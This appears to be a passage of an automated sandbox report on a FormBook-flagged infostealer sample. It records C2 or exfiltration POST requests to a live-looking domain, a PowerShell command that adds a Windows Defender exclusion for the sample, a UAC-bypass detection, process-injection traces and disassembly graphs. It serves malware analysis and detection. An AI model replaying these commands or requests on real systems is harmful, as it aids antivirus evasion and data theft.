                                            x-via: ASH1
                                            connection: close
                                            Data Ascii: C4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            33 | 192.168.2.6 | 49759 | 142.250.185.83 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:54:52.401451111 CEST | 751 | OUT | POST /odz6/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.bayviewcribbage.com
                                            Origin: http://www.bayviewcribbage.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.bayviewcribbage.com/odz6/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG=t0kRFPyH+zyzXfIW9RWmMgYu0ZgTa2bAPi5C7xW80R3d8y3PQIAEGeAOQ+yXimB64iwpU/vY86G460i8rx94Zos/Lp6onFDW+RfS/40lWNJT+dyRrp18WWUighAC6Lt5wIONIODG9phwDDK2zZPuRBIQbndKU98hYk13tAOCZ66TN5qD9EpXszgSTsqQxV/UUyvz/sIIsr+R
                                            Jul 3, 2024 18:54:53.154165983 CEST | 409 | IN | HTTP/1.1 301 Moved Permanently
                                            Content-Type: application/binary
                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                            Date: Wed, 03 Jul 2024 16:54:53 GMT
                                            Location: https://www.bayviewcribbage.com/odz6/
                                            Server: ESF
                                            Content-Length: 0
                                            X-XSS-Protection: 0
                                            X-Frame-Options: SAMEORIGIN
                                            X-Content-Type-Options: nosniff
                                            Connection: close


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            34 | 192.168.2.6 | 49760 | 142.250.185.83 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:54:54.933614016 CEST | 775 | OUT | POST /odz6/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.bayviewcribbage.com
                                            Origin: http://www.bayviewcribbage.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.bayviewcribbage.com/odz6/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG=t0kRFPyH+zyzYaAWu2CmKAYxxZgTQWbbPilC70uK0jTd9SnPXN0EBeAOYeyYsGA44iMQU9LY87m461S8rGAuY4s9HJ6q6VDW+RfS/4hKWJlT+OqRrI1/VWVQjhACxrtiwIOVILaj9rpwDG22yMvtYBIKWHceUsVafl16rGnnAKWoFvrZh3p0+jAQTuyix1/+WyXzt7EvjfbyAXMIf1SAi84ra7klAKB4xA==
                                            Jul 3, 2024 18:54:55.659480095 CEST | 409 | IN | HTTP/1.1 301 Moved Permanently
                                            Content-Type: application/binary
                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                            Date: Wed, 03 Jul 2024 16:54:55 GMT
                                            Location: https://www.bayviewcribbage.com/odz6/
                                            Server: ESF
                                            Content-Length: 0
                                            X-XSS-Protection: 0
                                            X-Frame-Options: SAMEORIGIN
                                            X-Content-Type-Options: nosniff
                                            Connection: close


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            35 | 192.168.2.6 | 49761 | 142.250.185.83 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:54:57.465045929 CEST | 1788 | OUT | POST /odz6/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.bayviewcribbage.com
                                            Origin: http://www.bayviewcribbage.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.bayviewcribbage.com/odz6/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:54:58.193600893 CEST | 409 | IN | HTTP/1.1 301 Moved Permanently
                                            Content-Type: application/binary
                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                            Date: Wed, 03 Jul 2024 16:54:58 GMT
                                            Location: https://www.bayviewcribbage.com/odz6/
                                            Server: ESF
                                            Content-Length: 0
                                            X-XSS-Protection: 0
                                            X-Frame-Options: SAMEORIGIN
                                            X-Content-Type-Options: nosniff
                                            Connection: close


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            36 | 192.168.2.6 | 49762 | 142.250.185.83 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:54:59.995413065 CEST | 485 | OUT | GET /odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr+d5ouA/hJc9ntyVwHyC0jENaFifi0j0/YggYyTtohP/rQs3Pv13bgnK1VWNIV+aS38IFIZFluiy4+zt0Ak7+zX+w=&3pSl=bXiTJHhxyN HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.bayviewcribbage.com
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:55:00.746496916 CEST | 570 | IN | HTTP/1.1 301 Moved Permanently
                                            Content-Type: application/binary
                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                            Date: Wed, 03 Jul 2024 16:55:00 GMT
                                            Location: https://www.bayviewcribbage.com/odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr+d5ouA/hJc9ntyVwHyC0jENaFifi0j0/YggYyTtohP/rQs3Pv13bgnK1VWNIV+aS38IFIZFluiy4+zt0Ak7+zX+w%3D&3pSl=bXiTJHhxyN
                                            Server: ESF
                                            Content-Length: 0
                                            X-XSS-Protection: 0
                                            X-Frame-Options: SAMEORIGIN
                                            X-Content-Type-Options: nosniff
                                            Connection: close



                                            Target ID:0
                                            Start time:12:51:55
                                            Start date:03/07/2024
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe"
                                            Imagebase:0x1df09ec0000
                                            File size:2'928'646 bytes
                                            MD5 hash:0D866E84B1B42F3B924D671DB5B3B40E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:12:51:55
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:12:51:56
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:12:51:56
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:12:51:57
                                            Start date:03/07/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                            Wow64 process (32bit):
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                            Imagebase:
                                            File size:2'141'552 bytes
                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:6
                                            Start time:12:51:57
                                            Start date:03/07/2024
                                            Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                            Imagebase:0x910000
                                            File size:166'912 bytes
                                            MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:9
                                            Start time:12:51:57
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\WerFault.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 1512 -s 1456
                                            Imagebase:0x7ff710020000
                                            File size:570'736 bytes
                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:10
                                            Start time:12:52:00
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff717f30000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:11
                                            Start time:12:52:10
                                            Start date:03/07/2024
                                            Path:C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe"
                                            Imagebase:0xa70000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:false

                                            Target ID:13
                                            Start time:12:52:12
                                            Start date:03/07/2024
                                            Path:C:\Windows\SysWOW64\sc.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\sc.exe"
                                            Imagebase:0x890000
                                            File size:61'440 bytes
                                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:14
                                            Start time:12:52:24
                                            Start date:03/07/2024
                                            Path:C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe"
                                            Imagebase:0xa70000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:false

                                            Target ID:15
                                            Start time:12:52:28
                                            Start date:03/07/2024
                                            Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                            Imagebase:0x910000
                                            File size:166'912 bytes
                                            MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:16
                                            Start time:12:52:29
                                            Start date:03/07/2024
                                            Path:C:\Windows\SysWOW64\unregmp2.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
                                            Imagebase:0xbf0000
                                            File size:214'528 bytes
                                            MD5 hash:51629AAAF753C6411D0B7D37620B7A83
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:17
                                            Start time:12:52:29
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\unregmp2.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
                                            Imagebase:0x7ff6d64f0000
                                            File size:265'216 bytes
                                            MD5 hash:A6FC8CE566DEC7C5873CB9D02D7B874E
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:20
                                            Start time:12:52:37
                                            Start date:03/07/2024
                                            Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                            Imagebase:0x910000
                                            File size:166'912 bytes
                                            MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:21
                                            Start time:12:52:37
                                            Start date:03/07/2024
                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                            Imagebase:0x7ff728280000
                                            File size:676'768 bytes
                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                              Execution Graph

                                              Execution Coverage:9.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:6
                                              Total number of Limit Nodes:0
                                              execution_graph 16839 7ffd34680921 16840 7ffd3468094f FreeConsole 16839->16840 16842 7ffd346809ce 16840->16842 16835 7ffd3468350a 16836 7ffd34683519 VirtualProtect 16835->16836 16838 7ffd346835f1 16836->16838
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @ls4$zs4$zs4
                                              • API String ID: 0-2956415519
                                              • Opcode ID: f11fc4b0db5b02894026a65cfde83fe4d87e34e04cbd7ddcadf602d6a3174c38
                                              • Instruction ID: 02d958df96629d6d9b14e3f36616c33ce607d42fe938e93839a1f4ad629f0b65
                                              • Opcode Fuzzy Hash: f11fc4b0db5b02894026a65cfde83fe4d87e34e04cbd7ddcadf602d6a3174c38
                                              • Instruction Fuzzy Hash: 86C2A271A09A598FEBA8DF18C4A5AF977E1FF56300F1400BAD14EC7292DE78AC41DB41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `Os4$`Os4
                                              • API String ID: 0-1505468668
                                              • Opcode ID: 3603b1d0092b35040512eeb51261b8bc0b9e0304f19f846a808823c380195e4c
                                              • Instruction ID: 2faa429ace6a69dc323063ed9ad9f0a99d48adcc3bfb95c444faba2039cd5704
                                              • Opcode Fuzzy Hash: 3603b1d0092b35040512eeb51261b8bc0b9e0304f19f846a808823c380195e4c
                                              • Instruction Fuzzy Hash: 1DC2563060CB594FE79DDF2884A14B5B7E1FF96301B1445BEE58AC72A6DE38E842C781

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 798 7ffd34693f62-7ffd34693fc0 801 7ffd34694031-7ffd3469403b 798->801 802 7ffd34693fc2-7ffd34693fc4 798->802 803 7ffd3469403d-7ffd3469403e 801->803 804 7ffd34693fc6 802->804 805 7ffd34694040-7ffd3469404b 802->805 803->805 806 7ffd34693fc8-7ffd34693fcc 804->806 807 7ffd3469400c-7ffd3469400f 804->807 812 7ffd3469404d-7ffd34694056 805->812 806->803 811 7ffd34693fce-7ffd34693fd1 806->811 808 7ffd3469408b-7ffd34694097 807->808 809 7ffd34694011 807->809 816 7ffd34694098-7ffd346940a8 808->816 814 7ffd34694057-7ffd3469405c 809->814 815 7ffd34694013-7ffd34694017 809->815 811->812 813 7ffd34693fd3 811->813 812->814 817 7ffd34693fd5-7ffd3469400b 813->817 818 7ffd34694019-7ffd3469401c 813->818 819 7ffd346940d8-7ffd346940d9 814->819 820 7ffd3469405d 814->820 815->818 821 7ffd34694088-7ffd3469408a 815->821 831 7ffd346940a9-7ffd346940b2 816->831 817->807 834 7ffd3469407c-7ffd34694086 817->834 818->816 824 7ffd3469401e 818->824 825 7ffd346940da-7ffd346940e8 819->825 822 7ffd346940ce-7ffd346940d7 820->822 823 7ffd3469405e-7ffd34694063 820->823 821->808 822->819 830 7ffd34694064-7ffd34694069 823->830 823->831 829 7ffd34694020-7ffd3469402f 824->829 824->830 839 7ffd346940ea-7ffd346940f9 825->839 829->801 830->825 835 7ffd3469406b-7ffd3469406e 830->835 832 7ffd3469412e 831->832 833 7ffd346940b3 831->833 842 7ffd34694130-7ffd34694132 832->842 837 7ffd34694124-7ffd3469412d 833->837 838 7ffd346940b4-7ffd346940b5 833->838 834->821 835->839 840 7ffd34694070 835->840 837->832 843 7ffd346940b6-7ffd346940b7 838->843 846 7ffd34694175 839->846 847 7ffd346940fa 839->847 840->843 844 7ffd34694072-7ffd34694079 840->844 845 7ffd34694133-7ffd34694138 842->845 843->845 850 7ffd346940b8 843->850 844->834 853 7ffd34694139-7ffd3469413e 845->853 852 7ffd34694177-7ffd34694179 846->852 848 7ffd3469416b-7ffd34694174 847->848 849 7ffd346940fb-7ffd346940fe 847->849 848->846 854 7ffd3469417a-7ffd3469417f 849->854 855 7ffd346940ff 849->855 850->853 
856 7ffd346940b9 850->856 852->854 857 7ffd346941ba-7ffd346941bb 853->857 858 7ffd3469413f 853->858 860 7ffd34694180-7ffd34694185 854->860 855->860 861 7ffd34694100 855->861 856->855 862 7ffd346940ba-7ffd346940bf 856->862 864 7ffd346941bc-7ffd346941be 857->864 859 7ffd34694140-7ffd34694143 858->859 865 7ffd34694145 859->865 866 7ffd346941bf-7ffd346941cb 859->866 870 7ffd34694186 860->870 871 7ffd34694201 860->871 867 7ffd34694146-7ffd3469414b 861->867 868 7ffd34694101-7ffd34694106 861->868 862->842 869 7ffd346940c1-7ffd346940c4 862->869 864->866 865->867 872 7ffd3469418b 865->872 877 7ffd346941cc 866->877 867->864 873 7ffd3469414d-7ffd34694150 867->873 868->852 874 7ffd34694108-7ffd3469410b 868->874 869->859 875 7ffd346940c6 869->875 878 7ffd346941f7-7ffd34694200 870->878 879 7ffd34694187-7ffd3469418a 870->879 876 7ffd34694203 871->876 880 7ffd3469420c-7ffd34694212 872->880 881 7ffd3469418c 872->881 873->877 882 7ffd34694152 873->882 874->879 883 7ffd3469410c 874->883 875->883 884 7ffd346940c8-7ffd346940cb 875->884 885 7ffd34694239 876->885 886 7ffd34694204-7ffd34694205 876->886 887 7ffd34694248 877->887 888 7ffd346941cd 877->888 878->871 879->872 889 7ffd34694206-7ffd3469420a 879->889 901 7ffd34694213-7ffd34694218 880->901 890 7ffd3469418d-7ffd34694192 881->890 891 7ffd346941d2 881->891 892 7ffd34694198 882->892 893 7ffd34694153-7ffd3469416a 882->893 883->890 894 7ffd3469410d 883->894 884->822 896 7ffd3469423b-7ffd3469423c 885->896 886->889 897 7ffd3469424a 887->897 899 7ffd3469423e-7ffd34694246 888->899 900 7ffd346941ce-7ffd346941d1 888->900 889->880 890->876 902 7ffd34694194-7ffd34694197 890->902 907 7ffd34694253-7ffd34694257 891->907 908 7ffd346941d3 891->908 903 7ffd34694219-7ffd34694222 892->903 904 7ffd34694199 892->904 893->848 894->893 905 7ffd3469410e-7ffd34694123 894->905 896->899 906 7ffd3469424d-7ffd34694252 897->906 900->891 900->906 901->903 902->892 902->901 903->896 909 7ffd34694224-7ffd34694225 903->909 910 7ffd3469419a-7ffd346941b5 904->910 911 
7ffd346941df-7ffd346941e0 904->911 905->837 906->907 918 7ffd3469425a-7ffd34694297 907->918 908->903 913 7ffd346941d4-7ffd346941d9 908->913 916 7ffd34694226-7ffd34694231 909->916 910->857 911->916 921 7ffd346941e1-7ffd346941f6 911->921 913->897 915 7ffd346941db-7ffd346941de 913->915 915->911 915->918 916->896 923 7ffd34694233-7ffd34694238 916->923 922 7ffd34694298-7ffd346942b4 call 7ffd34680288 918->922 921->878 928 7ffd346942b6-7ffd346942c4 call 7ffd34688400 922->928 923->885 931 7ffd346942c9-7ffd346942e9 928->931 932 7ffd346942ef-7ffd34694347 call 7ffd34688430 931->932 933 7ffd34694403-7ffd34694454 call 7ffd346802e8 call 7ffd34688428 931->933 940 7ffd3469434c-7ffd3469435d 932->940 944 7ffd34694459-7ffd3469446c 933->944 940->931
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (rs4$(rs4
                                              • API String ID: 0-1344946526
                                              • Opcode ID: 750055f91f47fb0fd65b6b51377ef65aa0daf1ef60b97f02b522a0ca5dae3e07
                                              • Instruction ID: 6a6e24a7946560ac324e9236be56bf1034396070511f87d251769b3f6dcb9faa
                                              • Opcode Fuzzy Hash: 750055f91f47fb0fd65b6b51377ef65aa0daf1ef60b97f02b522a0ca5dae3e07
                                              • Instruction Fuzzy Hash: 65024B31B0CA594FE3ACDF1C84A65F437D1FF9A310B1402BED54ECB6A2DA5CA8069381

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fish$x$q4
                                              • API String ID: 0-2381136664
                                              • Opcode ID: 834889767fba32f009861e73d96d69342a9904fbb2ade37beff3e0910480dbfc
                                              • Instruction ID: 57cb3f82a9101f9f8e2c4a36b45ac40d4233c47fec1f210676cbe3df10c2d1a5
                                              • Opcode Fuzzy Hash: 834889767fba32f009861e73d96d69342a9904fbb2ade37beff3e0910480dbfc
                                              • Instruction Fuzzy Hash: C5D12930B1CB5A4FE79CAB2888A55F577E1FF96300B04417ED58BC3292EE28EC429741

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
Control-flow graph (rendered graph image not reproduced): function starting at 7ffd3468ca60, basic blocks through 7ffd3468d167; internal calls to 7ffd3468b4a0, 7ffd346873a0, 7ffd3468be70, 7ffd34687740, 7ffd34688a90, 7ffd34688330, 7ffd34689c40; no Windows API calls in the graph.
Strings
Memory Dump Source
• Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
Similarity
• API ID:
